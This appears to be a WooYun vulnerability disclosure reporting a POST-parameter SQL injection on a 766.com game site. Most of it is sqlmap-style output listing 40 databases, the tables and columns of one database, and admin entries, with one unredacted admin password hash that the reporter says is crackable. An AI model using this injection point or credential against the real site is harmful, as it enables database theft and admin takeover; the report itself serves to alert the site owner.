WooYun.org

766游戏网POST注入多库信息泄露
注入点：
http://dynamic.766.com/simulator/dnfbs/search/count_keyword keyword=1&submit=88952634
注入到的数据库：
vailable databases [40]:
[*] dynamic_hd_c9lianzhao
[*] dynamic_hd_ccjoylyb
[*] dynamic_hd_cf_khjm
[*] dynamic_hd_csol
[*] dynamic_hd_cyhx3zn
[*] dynamic_hd_cyhxapp
[*] dynamic_hd_dnf_aldjh
[*] dynamic_hd_dota_rep
[*] dynamic_hd_girl
[*] dynamic_hd_hxmh_vote
[*] dynamic_hd_kfcs
[*] dynamic_hd_marry
[*] dynamic_hd_mjsg
[*] dynamic_hd_mxd3years
[*] dynamic_hd_news_zhongqiu
[*] dynamic_hd_newtiyang
[*] dynamic_hd_orther_xuyuanqian
[*] dynamic_hd_orther_yingxiong
[*] dynamic_hd_others_dnfxuanshou
[*] dynamic_hd_others_dnfzhongqiubless
[*] dynamic_hd_others_mhxydati
[*] dynamic_hd_others_mxddtq
[*] dynamic_hd_others_qqxwshow
[*] dynamic_hd_others_qxdati
[*] dynamic_hd_others_wddtq
[*] dynamic_hd_others_xchbdati
[*] dynamic_hd_smdt
[*] dynamic_hd_speed_tga
[*] dynamic_hd_speed_tractate
[*] dynamic_hd_zdzw
[*] dynamic_hd_zhuxian_ryzl
[*] dynamic_hd_ztbs
[*] dynamic_orther_dnfzb
[*] dynamic_ppkdc_clcx
[*] dynamic_xinyoupindao
[*] hd_baidu_dtq
[*] hd_c9_moniqi
[*] information_schema
[*] test
[*] x_common
跑当前库信息：
Database: dynamic_hd_others_dnfxuanshou
[6 tables]
+---------+
| admins |
| discuss |
| huati |
| rili |
| search |
| vote |
+---------+
跑字段信息：
Table: admins
[3 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| id | int(8) |
| password | char(32) |
| username | char(25) |
+----------+----------+
跑用户信息：
Table: admins
[2 entries]
+----+-----------+----------------------------------+
| id | username | password |
+----+-----------+----------------------------------+
| 5 | huangchao | e290f064340204b87efe138c3d3e9461 |
| 3 | 766虫子 | xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|
试了766虫子的密码是可以破解出来了，后台未登录，涉及到的游戏相关的子站点较多。
请速解决吧。